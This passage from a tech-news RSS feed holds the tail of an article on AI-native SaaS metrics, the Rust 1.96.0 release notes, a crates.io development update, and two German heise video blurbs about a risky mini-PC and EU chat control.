<p class="wp-block-paragraph">When SaaS was in its infancy, companies settled on key metrics designed to answer a small set of core questions. Are we growing? Are customers using the product? Are we retaining and expanding accounts?</p>



<p class="wp-block-paragraph">But as AI upends software itself, it is also requiring companies to adopt new metrics to track success. These new metrics fall into three primary buckets, rebuilt around the pricing spectrum described earlier and the trend toward credits as the primary frame:</p>



<h3 class="wp-block-heading">Revenue composition</h3>



<ul class="wp-block-list">
<li>Committed credit annual recurring revenue (ARR) vs. burndown ARR: Measuring the credits sold on annual commitment vs. those consumed and replenished. This is the single most important split for valuation. Committed credits behave like subscription and burndown behaves like usage.</li>



<li>Credit utilization rate: The percentage of purchased credits consumed per period. This is a leading indicator of renewal sizing.</li>



<li>Credit burn velocity: How fast is a customer consuming their credits, and is that consumption increasing or decreasing quarter over quarter? This metric predicts expansion or contraction before it shows up in ARR.</li>



<li>Effective price per credit: The real revenue per credit after discounts, overage and rollover, which can detect revenue leakage and help companies set smarter guide rails.</li>
</ul>



<h3 class="wp-block-heading">Margin reality</h3>



<ul class="wp-block-list">
<li>Credit margin: The gross profit the company earns per credit after subtracting inference costs. This is the core economic unit for AI-native, usage-based businesses — the replacement for gross margin per seat used in SaaS.</li>



<li>Inference-adjusted gross margin: By carving out AI inference costs separately in the P&amp;L statement, you can see true AI margins, avoid hiding deterioration inside blended SaaS margins, and clearly distinguish AI economics from legacy SaaS economics.</li>



<li>Compute leverage ratio: This metric measures how efficiently the business converts compute spend into revenue. It shows whether your AI margins are improving as you scale.</li>



<li>AI-adjusted “Rule of 40”: This updated metric recalibrates the traditional growth and profitability benchmark to account for AI’s lower gross margins and variable inference costs, giving a more accurate picture of business health for AI-native companies.</li>
</ul>



<h3 class="wp-block-heading">Behavioral and value signals</h3>



<ul class="wp-block-list">
<li>Time-to-first outcome: Replaces traditional onboarding metrics. Tracks how fast a customer reaches their first measurable result.</li>



<li>Adoption: AI-native adoption is measured by workflow penetration and active agent density, not seat count. As AI replaces human-driven usage, the unit of adoption shifts from people to automated workflows and agents.</li>



<li>Net credit retention (NCR): Credit-volume retention across the customer base, tracked separately from net recurring revenue to avoid price-change impact.</li>
</ul>



<p class="wp-block-paragraph">Along with these new metrics, the industry’s transformation is prompting companies to retire or recalibrate old SaaS measures, including per-seat ARR as a primary key performance indicator (KPI), traditional magic number calibrated to subscription dynamics, unadjusted Rule of 40, customer success metrics tied to human touchpoints, and blended gross margin without AI COGS carve-outs.</p>



<h2 class="wp-block-heading">What does this mean for enterprise value calculations?</h2>



<p class="wp-block-paragraph">As the internal metrics of success change, so do the ways the investment community measures growth and long-term viability.</p>



<p class="wp-block-paragraph">Increasingly, a company’s valuation multiple depends on whether its revenue behaves like committed subscription ARR or volatile usage ARR, and the commit‑to‑burndown ratio is the metric investors use to decide where the company fits.</p>



<p class="wp-block-paragraph">For example, a business with 80% committed credit ARR could trade closer to subscription comps and one with 80% burndown could trade closer to usage comps even though both have the same types of customers. Being able to proactively explain the commit‑to‑burndown mix can help companies avoid undervaluation.</p>



<p class="wp-block-paragraph">In addition, utilization is expected to replace net promoter scores and seat usage as the primary predictor of churn or expansion. Low utilization guarantees downsizing at renewal, so companies must track utilization cohorts the same way SaaS tracks logo retention cohorts today.</p>



<p class="wp-block-paragraph">We’re also seeing an inversion of the operating model, with R&amp;D and COGS moving up the P&amp;L and sales and marketing (S&amp;M) and customer success (CS) moving down or sideways. The net operating leverage profile is structurally different from classical SaaS, and the cost-to-scale curve looks different too.</p>



<p class="wp-block-paragraph">Finally, credit margin engineering is a hidden value-creation lever. The gap between price per credit and cost per credit is set by the software vendor and can be optimized. Most operators have barely started managing this rigorously, and the ones who do will pull away on margin.</p>



<h2 class="wp-block-heading">What this means for leaders, boards and investors</h2>



<p class="wp-block-paragraph">The shift from classic SaaS metrics to new AI‑native measures isn’t cosmetic. It represents the seismic change the industry is experiencing as AI matures and transforms products and organizations.</p>



<p class="wp-block-paragraph">While these metrics — and perhaps others yet to be determined — may evolve over time, there is no doubt they are already changing how AI companies allocate capital, price products, incent sales teams, evaluate performance and communicate with investors.</p>



<p class="wp-block-paragraph">It’s important to remember that SaaS metrics were practical tools for a specific era of software. As that era draws to a close, winning companies will choose new metrics that shape behavior and drive smart decision-making.</p>



<p class="wp-block-paragraph"><em>The views reflected in this article are the views of the author and do not necessarily reflect the views of Ernst &amp; Young LLP or other members of the global EY organization.</em></p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Rust Programming Language Blog: Announcing Rust 1.96.0]]></title>
<description><![CDATA[The Rust team is happy to announce a new version of Rust, 1.96.0. Rust is a programming language empowering everyone to build reliable and efficient software.
If you have a previous version of Rust installed via rustup, you can get 1.96.0 with:
$ rustup update stable
If you don't have it already,...]]></description>
<link>https://tsecurity.de/de/3693296/tools/the-rust-programming-language-blog-announcing-rust-1960/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693296/tools/the-rust-programming-language-blog-announcing-rust-1960/</guid>
<pubDate>Sat, 25 Jul 2026 08:37:36 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Rust team is happy to announce a new version of Rust, 1.96.0. Rust is a programming language empowering everyone to build reliable and efficient software.</p>
<p>If you have a previous version of Rust installed via <code>rustup</code>, you can get 1.96.0 with:</p>
<pre class="giallo z-code"><code><span class="giallo-l"><span>$</span><span> rustup update stable</span></span></code></pre>
<p>If you don't have it already, you can <a href="https://www.rust-lang.org/install.html" rel="external">get <code>rustup</code></a> from the appropriate page on our website, and check out the <a href="https://doc.rust-lang.org/stable/releases.html#version-1960-2026-05-28" rel="external">detailed release notes for 1.96.0</a>.</p>
<p>If you'd like to help us out by testing future releases, you might consider updating locally to use the beta channel (<code>rustup default beta</code>) or the nightly channel (<code>rustup default nightly</code>). Please <a href="https://github.com/rust-lang/rust/issues/new/choose" rel="external">report</a> any bugs you might come across!</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/05/28/Rust-1.96.0/#what-s-in-1-96-0-stable"></a>
What's in 1.96.0 stable</h3>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/05/28/Rust-1.96.0/#new-range-types"></a>
New <code>Range*</code> types</h4>
<p>Many users expect <code>Range</code> and related <code>core::ops</code> types to be <code>Copy</code>, but this is not the case: they implement <code>Iterator</code> directly, and <a href="https://rust-lang.github.io/rust-clippy/rust-1.95.0/index.html#copy_iterator" rel="external">it is a footgun to implement both <code>Iterator</code> and <code>Copy</code> on the same type</a> so this has been avoided. <a href="https://rust-lang.github.io/rfcs/3550-new-range.html" rel="external">RFC3550</a> proposed a set of replacement range types that implement <code>IntoIterator</code> rather than <code>Iterator</code>, meaning they can also be <code>Copy</code>. The standard library portion of that RFC is now stable, introducing:</p>
<ul>
<li><code>core::range::Range</code></li>
<li><code>core::range::RangeFrom</code></li>
<li><code>core::range::RangeInclusive</code></li>
<li>Associated iterators</li>
</ul>
<p>A Rust version in the near future will also add <code>core::range::RangeFull</code> and <code>core::range::RangeTo</code> as re-exports from <code>core::ops</code> (these do not implement <code>Iterator</code> and already implement <code>Copy</code>), and <code>core::range::legacy::*</code> as the new home for the current ranges. Range syntax like <code>0..1</code> still produces the legacy types for now, but will be updated to <code>core::range</code> types in a future edition.</p>
<p>With these stabilizations, it is now possible to store slice accessors in <code>Copy</code> types without splitting <code>start</code> and <code>end</code>:</p>
<pre class="giallo z-code"><code><span class="giallo-l"><span class="z-keyword">use</span><span class="z-entity z-name z-namespace"> core</span><span class="z-keyword z-operator">::</span><span class="z-entity z-name z-namespace">range</span><span class="z-keyword z-operator">::</span><span class="z-entity z-name z-type">Range</span><span>;</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span>#</span><span>[</span><span>derive</span><span>(</span><span class="z-entity z-name z-type">Clone</span><span>,</span><span class="z-entity z-name z-type"> Copy</span><span>)</span><span>]</span></span>
<span class="giallo-l"><span class="z-keyword">pub</span><span class="z-storage z-type"> struct</span><span class="z-entity z-name z-type"> Span</span><span>(</span><span class="z-entity z-name z-type">Range</span><span>&lt;</span><span class="z-entity z-name z-type">usize</span><span>&gt;</span><span>)</span><span>;</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span class="z-keyword">impl</span><span class="z-entity z-name z-type"> Span</span><span> {</span></span>
<span class="giallo-l"><span class="z-keyword">    pub</span><span class="z-keyword"> fn</span><span class="z-entity z-name z-function"> of</span><span>(</span><span class="z-variable z-language">self</span><span>,</span><span class="z-variable"> s</span><span class="z-keyword z-operator">:</span><span class="z-keyword z-operator"> &amp;</span><span class="z-entity z-name z-type">str</span><span>)</span><span class="z-keyword z-operator"> -&gt;</span><span class="z-keyword z-operator"> &amp;</span><span class="z-entity z-name z-type">str</span><span> {</span></span>
<span class="giallo-l"><span class="z-keyword z-operator">        &amp;</span><span class="z-variable">s</span><span>[</span><span class="z-variable z-language">self</span><span class="z-keyword z-operator">.</span><span class="z-constant z-numeric">0</span><span>]</span></span>
<span class="giallo-l"><span>    }</span></span>
<span class="giallo-l"><span>}</span></span></code></pre>
<p>The new <code>RangeInclusive</code> also makes its fields public, unlike the legacy version which avoided exposing the exhausted iterator state. This isn't a concern with the new type since it must be converted to begin iteration.</p>
<p>Library authors should consider making use of <code>impl RangeBounds</code> in public API, which accepts both legacy and new range types. If a concrete type is needed, prefer using new ranges as this will eventually become the default.</p>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/05/28/Rust-1.96.0/#assert-matching-patterns"></a>
Assert matching patterns</h4>
<p>The new macros <code>assert_matches!</code> and <code>debug_assert_matches!</code> check that a value matches a given pattern, panicking with a <code>Debug</code> representation of the value otherwise. These are essentially the same as <code>assert!(matches!(..))</code> and <code>debug_assert!(matches!(..))</code>, but the printed value improves the possibility of diagnosing the failure.</p>
<p>These new macros have not been added to the standard prelude, because they would collide with popular third-party crates that provide macros with the same name. Instead, they should be manually imported from <code>core</code> or <code>std</code> before use.</p>
<pre class="giallo z-code"><code><span class="giallo-l"><span class="z-keyword">use</span><span class="z-entity z-name z-namespace"> core</span><span class="z-keyword z-operator">::</span><span>assert_matches</span><span>;</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span class="z-punctuation z-definition z-comment z-comment">///</span><span class="z-comment"> [Random Number](https://xkcd.com/221/)</span></span>
<span class="giallo-l"><span class="z-keyword">fn</span><span class="z-entity z-name z-function"> get_random_number</span><span>(</span><span>)</span><span class="z-keyword z-operator"> -&gt;</span><span class="z-entity z-name z-type"> u32</span><span> {</span></span>
<span class="giallo-l"><span class="z-punctuation z-definition z-comment z-comment">    //</span><span class="z-comment z-line z-double-slash z-comment"> chosen by a fair dice roll.</span></span>
<span class="giallo-l"><span class="z-punctuation z-definition z-comment z-comment">    //</span><span class="z-comment z-line z-double-slash z-comment"> guaranteed to be random.</span></span>
<span class="giallo-l"><span class="z-constant z-numeric">    4</span></span>
<span class="giallo-l"><span>}</span></span>
<span class="giallo-l"></span>
<span class="giallo-l"><span class="z-keyword">fn</span><span class="z-entity z-name z-function"> main</span><span>(</span><span>)</span><span> {</span></span>
<span class="giallo-l"><span class="z-entity z-name z-function">    assert_matches!</span><span>(</span><span class="z-entity z-name z-function">get_random_number</span><span>(</span><span>)</span><span>,</span><span class="z-constant z-numeric"> 1</span><span class="z-keyword z-operator">..=</span><span class="z-constant z-numeric">6</span><span>)</span><span>;</span></span>
<span class="giallo-l"><span>}</span></span></code></pre><h4><a class="anchor" href="https://blog.rust-lang.org/2026/05/28/Rust-1.96.0/#changes-to-webassembly-targets"></a>
Changes to WebAssembly targets</h4>
<p>WebAssembly targets no longer pass <code>--allow-undefined</code> to the linker which means that undefined symbols when linking are now a linker error instead of being converted to WebAssembly imports from the <code>"env"</code> module. This change prevents modules from linking unless all linking-related symbols are defined to catch bugs earlier and prevent accidental issues with symbol naming or similar.</p>
<p>Undefined linking-related symbols are often indicative of build-time related bugs or misconfiguration. If, however, the old behavior is intended then it can be re-enabled with <code>RUSTFLAGS=-Clink-arg=--allow-undefined</code> or by editing the source code and using <code>#[link(wasm_import_module = "env")]</code> on the block defining the symbol.</p>
<p>This change was <a href="https://blog.rust-lang.org/2026/04/04/changes-to-webassembly-targets-and-handling-undefined-symbols/" rel="external">previously announced</a> on this blog, and now takes effect in Rust 1.96.</p>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/05/28/Rust-1.96.0/#stabilized-apis"></a>
Stabilized APIs</h4>
<ul>
<li><a href="https://doc.rust-lang.org/stable/std/macro.assert_matches.html" rel="external"><code>assert_matches!</code></a></li>
<li><a href="https://doc.rust-lang.org/stable/std/macro.debug_assert_matches.html" rel="external"><code>debug_assert_matches!</code></a></li>
<li><a href="https://doc.rust-lang.org/stable/std/panic/struct.AssertUnwindSafe.html#impl-From%3CT%3E-for-AssertUnwindSafe%3CT%3E" rel="external"><code>From&lt;T&gt; for AssertUnwindSafe&lt;T&gt;</code></a></li>
<li><a href="https://doc.rust-lang.org/stable/std/cell/struct.LazyCell.html#impl-From%3CT%3E-for-LazyCell%3CT,+F%3E" rel="external"><code>From&lt;T&gt; for LazyCell&lt;T, F&gt;</code></a></li>
<li><a href="https://doc.rust-lang.org/stable/std/sync/struct.LazyLock.html#impl-From%3CT%3E-for-LazyLock%3CT,+F%3E" rel="external"><code>From&lt;T&gt; for LazyLock&lt;T, F&gt;</code></a></li>
<li><a href="https://doc.rust-lang.org/stable/core/range/struct.RangeToInclusive.html" rel="external"><code>core::range::RangeToInclusive</code></a></li>
<li><a href="https://doc.rust-lang.org/stable/core/range/struct.RangeFrom.html" rel="external"><code>core::range::RangeFrom</code></a></li>
<li><a href="https://doc.rust-lang.org/stable/core/range/struct.RangeFromIter.html" rel="external"><code>core::range::RangeFromIter</code></a></li>
<li><a href="https://doc.rust-lang.org/stable/core/range/struct.Range.html" rel="external"><code>core::range::Range</code></a></li>
<li><a href="https://doc.rust-lang.org/stable/core/range/struct.RangeIter.html" rel="external"><code>core::range::RangeIter</code></a></li>
</ul>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/05/28/Rust-1.96.0/#two-cargo-advisories"></a>
Two Cargo advisories</h4>
<p>Rust 1.96 contains fixes for two vulnerabilities for users of third-party registries.</p>
<ul>
<li>
<p><a href="https://blog.rust-lang.org/2026/05/25/cve-2026-5223/" rel="external">CVE-2026-5223</a> is a <strong>medium</strong> severity vulnerability regarding extraction of crate tarballs with symlinks.</p>
</li>
<li>
<p><a href="https://blog.rust-lang.org/2026/05/25/cve-2026-5222/" rel="external">CVE-2026-5222</a> is a <strong>low</strong> severity vulnerability regarding authentication with normalized URLs.</p>
</li>
</ul>
<p>Users of crates.io are <strong>not affected</strong> by either vulnerability.</p>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/05/28/Rust-1.96.0/#other-changes"></a>
Other changes</h4>
<p>Check out everything that changed in <a href="https://github.com/rust-lang/rust/releases/tag/1.96.0" rel="external">Rust</a>, <a href="https://doc.rust-lang.org/nightly/cargo/CHANGELOG.html#cargo-196-2026-05-28" rel="external">Cargo</a>, and <a href="https://github.com/rust-lang/rust-clippy/blob/master/CHANGELOG.md#rust-196" rel="external">Clippy</a>.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/05/28/Rust-1.96.0/#contributors-to-1-96-0"></a>
Contributors to 1.96.0</h3>
<p>Many people came together to create Rust 1.96.0. We couldn't have done it without all of you. <a href="https://thanks.rust-lang.org/rust/1.96.0/" rel="external">Thanks!</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Rust Programming Language Blog: crates.io: development update]]></title>
<description><![CDATA[Another six months have passed since our last development update, and the crates.io team has been busy. Here's a summary of the most notable changes and improvements made to crates.io since then.

Source Code Viewer
Crate pages now have a "Code" tab that lets you browse the contents of published ...]]></description>
<link>https://tsecurity.de/de/3693285/tools/the-rust-programming-language-blog-cratesio-development-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693285/tools/the-rust-programming-language-blog-cratesio-development-update/</guid>
<pubDate>Sat, 25 Jul 2026 08:37:18 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Another six months have passed since our <a href="https://blog.rust-lang.org/2026/01/21/crates-io-development-update/" rel="external">last development update</a>, and the crates.io team has been busy. Here's a summary of the most notable changes and improvements made to <a href="https://crates.io/" rel="external">crates.io</a> since then.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/07/13/crates-io-development-update/#source-code-viewer"></a>
Source Code Viewer</h3>
<p>Crate pages now have a "Code" tab that lets you browse the contents of published crate versions directly on crates.io. This shows you the exact files that <code>cargo</code> downloads when you add a crate as a dependency, which might differ from the linked repository. This makes it much easier to audit your dependencies, including files that never appear in the repository, like the normalized <code>Cargo.toml</code> files that <code>cargo</code> generates.</p>
<p><img alt='Source code viewer showing the "Code" tab of the serde crate' src="https://blog.rust-lang.org/2026/07/13/crates-io-development-update/code-tab.png"></p>
<p>The viewer comes with a file tree sidebar with search functionality, syntax highlighting, and GitHub-style line selection, where clicking or dragging line numbers produces shareable <code>#L10-L20</code> URLs.</p>
<p>Under the hood, the server now builds a zip file for every published version. Since the <code>.crate</code> files that <code>cargo</code> consumes are gzipped tarballs without random access support, a background job re-packs each of them into a seekable zip archive plus a JSON manifest describing the contained files. Both are served from our static CDN. The frontend then fetches only the manifest and loads each file on demand with an HTTP range request. Because of this architecture, browsing crate sources essentially adds no load on the crates.io API servers. Existing crate versions have been backfilled, so this works for old releases too.</p>
<p>The rendering library behind the code viewer is a diff renderer at heart, and that's no accident: a version-to-version diff viewer built on the same infrastructure is currently in the works. This will allow you to review exactly what changed between two published versions, right on crates.io. Stay tuned!</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/07/13/crates-io-development-update/#untangling-crates-io-accounts-from-github"></a>
Untangling crates.io Accounts from GitHub</h3>
<p>At the end of May, the crates.io team accepted <a href="https://github.com/rust-lang/rfcs/pull/3946" rel="external">RFC #3946</a>. Crates.io accounts always have been tightly coupled to GitHub: signing in means "Log in with GitHub", and your crates.io identity is your GitHub username. The RFC changes that. It introduces usernames that are native to crates.io and independent of linked GitHub accounts, as a prerequisite for eventually supporting login via other identity providers.</p>
<p>The implementation of crates.io usernames has started, but there is still a lot left to do, most visibly the ability to change your crates.io username. After that is complete, there will be future RFCs and implementation for signing in with identity providers other than GitHub. Since all of this touches authentication and account security, we are deliberately taking it slow and rolling these changes out in small, carefully reviewed steps.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/07/13/crates-io-development-update/#advisories-and-suggestions"></a>
Advisories and Suggestions</h3>
<p>In our <a href="https://blog.rust-lang.org/2026/01/21/crates-io-development-update/" rel="external">January update</a> we introduced the "Security" tab, which shows security advisories from the <a href="https://rustsec.org/" rel="external">RustSec</a> database. We have since taken this integration one step further: crates that RustSec has flagged as unmaintained now show a warning banner directly on their crate pages, linking to the corresponding advisory for details and possible alternatives. Thanks to <a href="https://github.com/djc" rel="external">Dirkjan Ochtman</a> for implementing this feature!</p>
<p><img alt="Unmaintained warning banner on the ansi_term crate page" src="https://blog.rust-lang.org/2026/07/13/crates-io-development-update/unmaintained-banner.png"></p>
<p>Related to this, some popular crates have been largely absorbed into the Rust standard library over the years, like <code>lazy_static</code>, which has been superseded by <code>std::sync::LazyLock</code> since Rust 1.80. Crate pages of such crates now show a friendly "You might not need this dependency" banner describing the standard library replacement, and superseded crates in dependency lists get a small light bulb icon with a similar hint.</p>
<p><img alt='"You might not need this dependency" banner on the lazy_static crate page' src="https://blog.rust-lang.org/2026/07/13/crates-io-development-update/std-replacement-banner.png"></p>
<p>The dataset behind this feature lives in the new <a href="https://github.com/rust-lang/std-replacement-data" rel="external">rust-lang/std-replacement-data</a> repository, together with a documented inclusion policy: standard library replacements only, every entry must cite the stable <code>std</code>, <code>core</code>, or <code>alloc</code> API and Rust version, and crate maintainers get a notice-and-comment window before an entry is added. New entries can be proposed upstream and can benefit other tools too.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/07/13/crates-io-development-update/#ferris"></a>
Ferris</h3>
<p>The most delightful change of this cycle: the Ferris on our error pages now follows your mouse cursor with its eyes:</p>
<p><img alt="Ferris' eyes following the mouse cursor on the error page" src="https://blog.rust-lang.org/2026/07/13/crates-io-development-update/ferris.gif"></p>
<p>Getting a 404 error on crates.io is now slightly less sad.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/07/13/crates-io-development-update/#svelte-frontend-migration-completed"></a>
Svelte Frontend Migration Completed</h3>
<p>In our <a href="https://blog.rust-lang.org/2026/01/21/crates-io-development-update/" rel="external">January update</a>, we announced that we were experimenting with porting the crates.io frontend from Ember.js to <a href="https://svelte.dev/" rel="external">Svelte</a>. This experiment has concluded successfully: the new frontend reached feature parity, went through a <a href="https://blog.rust-lang.org/inside-rust/2026/04/17/crates-io-svelte-public-testing/" rel="external">public testing phase</a> in April, became the default at the beginning of May, and the Ember.js app has been removed from our repository.</p>
<p>We designed this change to be invisible for our users, since the new frontend is a 1:1 port of the previous design and functionality. For the team and our contributors, however, it is a big deal: the frontend is now built on a more modern framework, which should make it easier for new contributors to get started. It also allows us to iterate faster, as the source code viewer above demonstrates.</p>
<p>We want to thank the <a href="https://emberjs.com/teams/" rel="external">Ember.js team</a> for a framework that served crates.io well for many years, and the Svelte team for making the transition so enjoyable.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/07/13/crates-io-development-update/#miscellaneous"></a>
Miscellaneous</h3>
<p>These were some of the more visible changes to crates.io over the past six months, but a lot has happened "under the hood" as well:</p>
<ul>
<li>
<p><strong>Search performance</strong>: Relevance-sorted search queries previously ranked every crate matching the query, which could take 1-2 seconds for short or common search terms. Ranking is now bounded to the 1,000 matching crates with the highest recent download counts.</p>
</li>
<li>
<p><strong>Reverse dependencies performance</strong>: The reverse dependencies endpoint no longer recomputes the full dependent set on every request. It is now served from a precomputed table kept in sync by database triggers, turning an expensive join into a bounded index scan and greatly reducing the chance of getting a timeout error.</p>
</li>
<li>
<p><strong>New ARCHITECTURE.md</strong>: If you've ever wondered how crates.io actually works, our <a href="https://github.com/rust-lang/crates.io/blob/main/docs/ARCHITECTURE.md" rel="external"><code>ARCHITECTURE.md</code></a> document got a complete rewrite. It is now organized around the high-level systems that make up crates.io and how they fit together, and includes walkthroughs of what happens when you run <code>cargo publish</code>, why a typical crate download never touches our API servers, and how download counts are derived from CDN access logs.</p>
</li>
<li>
<p><strong>Definition lists</strong>: READMEs now render Markdown <a href="https://github.com/rust-lang/crates.io/pull/13950" rel="external">definition lists</a>, a widely used Markdown extension. Our markdown renderer <a href="https://crates.io/crates/comrak" rel="external">comrak</a> already supported them, the extension just wasn't enabled yet. Thanks to <a href="https://github.com/mistaste" rel="external">@mistaste</a> for this contribution!</p>
</li>
<li>
<p><strong>CDN cache tags</strong>: Files uploaded to our static CDN now carry cache-tag metadata, allowing us to invalidate all cached files of a crate or a specific release in a single operation, instead of issuing one invalidation per file URL.</p>
</li>
<li>
<p><strong>Caching improvements</strong>: We removed a global <code>Vary: Cookie</code> response header that was preventing our CDNs from caching public API responses and frontend assets effectively. Per-user responses now use <code>Cache-Control: no-store</code> instead, resulting in better cache hit rates at the CDN edge.</p>
</li>
<li>
<p><strong>Accessibility</strong>: We have made crates.io friendlier to screen readers: decorative icons are now hidden from the accessibility tree, heading hierarchies have been fixed, and lists are marked up as proper lists. ARIA snapshot tests now ensure that regressions can't slip in unnoticed. We plan to continue to improve crates.io accessibility over the coming months.</p>
</li>
<li>
<p><strong>Git index performance</strong>: The background worker's local clone of the git index is now a bare and shallow repository, eliminating roughly 250,000 checked-out files and the full commit history from its disk, improving its performance as we see increased rates of crate publication. The periodic index squashing now goes through the GitHub API instead of generating large git packs locally, which had previously caused out-of-memory failures on the production worker.</p>
</li>
</ul>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/07/13/crates-io-development-update/#feedback"></a>
Feedback</h3>
<p>We hope you enjoyed this update on the development of crates.io. If you have any feedback or questions, please let us know on <a href="https://rust-lang.zulipchat.com/#narrow/stream/318791-t-crates-io" rel="external">Zulip</a> or <a href="https://github.com/rust-lang/crates.io/discussions" rel="external">GitHub</a>. We are always happy to hear from you and are looking forward to your feedback!</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Finger weg von diesem Mini-PC!]]></title>
<description><![CDATA[Author: heise &amp; c't - Bewertung: 2096x - Views:38698 Ein günstiger China-Mini-PC für 220 Euro klingt verlockend – doch beim Bmax B6 Plus lauern versteckte Sicherheitslücken, eine ungültige Windows-Lizenz und sogar Trojaner in den offiziellen Hersteller-Downloads. Wir zeigen euch, welche Gefah...]]></description>
<link>https://tsecurity.de/de/3693233/videos/finger-weg-von-diesem-mini-pc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693233/videos/finger-weg-von-diesem-mini-pc/</guid>
<pubDate>Sat, 25 Jul 2026 08:35:55 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: heise &amp;amp; c&#039;t - Bewertung: 2096x - Views:38698 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/uJqqk9XlBuM?autoplay=1&origin=https://tsecurity.de" frameborder="0"></iframe></p><p>Ein günstiger China-Mini-PC für 220 Euro klingt verlockend – doch beim Bmax B6 Plus lauern versteckte Sicherheitslücken, eine ungültige Windows-Lizenz und sogar Trojaner in den offiziellen Hersteller-Downloads. Wir zeigen euch, welche Gefahren drohen und warum ein professionell aufbereiteter Refurbished-PC oft die deutlich bessere Alternative ist.<br />
<br />
Sponsorenhinweis<br />
Mit Mammouth bekommt ihr Zugriff auf KI-Modelle wie GPT, Claude, Gemini, Mistral, Grok, DeepSeek, Perplexity, Flux, Nano Banana und Recraft – alles vereint an einem Ort. Alles im Starterpaket brutto ab 11,90€ / Monat bei monatlicher Laufzeit oder 9,92€ / Monat bei jährlicher Laufzeit mit Vorauszahlung. Mehr Infos: http://mammouth.ai<br />
<br />
► Zum Artikel: <br />
Mini-PC Bmax B6 Plus mit Restposten-CPU im Test (€): https://heise.de/s/2AdbZ<br />
Günstige Gebraucht-PCs von erfahrenen Anbietern im Test  (€): https://heise.de/s/xK3om<br />
<br />
_____<br />
<br />
► c’t: https://www.ct.de<br />
► heise online: https://www.heise.de<br />
► heise online auf Instagram: https://www.instagram.com/heiseonline/<br />
► c&#039;t auf Instagram: https://www.instagram.com/ct_magazin/<br />
_____<br />
00:00 Einleitung<br />
00:48 Werbung<br />
01:46 Bmax mini Sonderheiten<br />
05:00 Performance<br />
06:50 Alternative zu Mini-PCs aus China<br />
_____<br />
Redaktion &amp; Video: Gordon Hof<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chatkontrolle 2026: Das müsst ihr jetzt wissen]]></title>
<description><![CDATA[Author: heise &amp; c't - Bewertung: 2352x - Views:35633 Euer Messenager verspricht euch Verschlüsselung. Niemand liest mit. So sagen es die meisten Hersteller. EU-Kommission und Mitgliedstaaten arbeiten seit Jahren daran, genau das aufzuweichen. Am 9. Juli haben sie einen umstrittenen Etappensie...]]></description>
<link>https://tsecurity.de/de/3693231/videos/chatkontrolle-2026-das-muesst-ihr-jetzt-wissen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693231/videos/chatkontrolle-2026-das-muesst-ihr-jetzt-wissen/</guid>
<pubDate>Sat, 25 Jul 2026 08:35:51 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: heise &amp;amp; c&#039;t - Bewertung: 2352x - Views:35633 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/fSzCyUxFJPA?autoplay=1&origin=https://tsecurity.de" frameborder="0"></iframe></p><p>Euer Messenager verspricht euch Verschlüsselung. Niemand liest mit. So sagen es die meisten Hersteller. EU-Kommission und Mitgliedstaaten arbeiten seit Jahren daran, genau das aufzuweichen. Am 9. Juli haben sie einen umstrittenen Etappensieg errungen. <br />
<br />
► Sponsorenhinweis<br />
Mit Mammouth bekommt ihr Zugriff auf KI-Modelle wie GPT, Claude, Gemini, Mistral, Grok, DeepSeek, Perplexity, Flux, Nano Banana und Recraft – alles vereint an einem Ort. Alles im Starterpaket brutto ab 11,90€ / Monat bei monatlicher Laufzeit oder 9,92€ / Monat bei jährlicher Laufzeit mit Vorauszahlung. Mehr Infos: http://mammouth.ai<br />
<br />
► Zum Artikel: https://heise.de/s/1ZKdp<br />
► Kommentar Volker Briegleb: https://heise.de/s/m1Ax4<br />
_____<br />
<br />
► c’t: https://www.ct.de<br />
► heise online: https://www.heise.de<br />
► heise online auf Instagram: https://www.instagram.com/heiseonline/<br />
► c&#039;t auf Instagram: https://www.instagram.com/ct_magazin/<br />
_____<br />
Redaktion: Gordon Hof<br />
Video: Carine Kinarian<br />
<br />
0:00 Einleitung<br />
0:20 WERBUNG<br />
1:19 Worum gehts?<br />
2:41 Parlament sagt Nein<br />
3:21 Tricks und Tricks<br />
4:33 Mehrheit dagegen?<br />
5:20 Und jetzt?<br />
6:12 Unsere Einordnung<br />
7:08 Fazit<br />
7:40 Ciao!<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT-Totalausfall in Berlin: Gerichte komplett lahmgelegt]]></title>
